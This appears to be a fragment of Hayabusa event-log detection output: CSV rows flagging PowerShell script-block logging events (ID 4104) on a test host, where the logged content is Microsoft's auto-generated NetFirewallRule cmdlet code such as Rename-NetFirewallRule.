[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') 
-and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
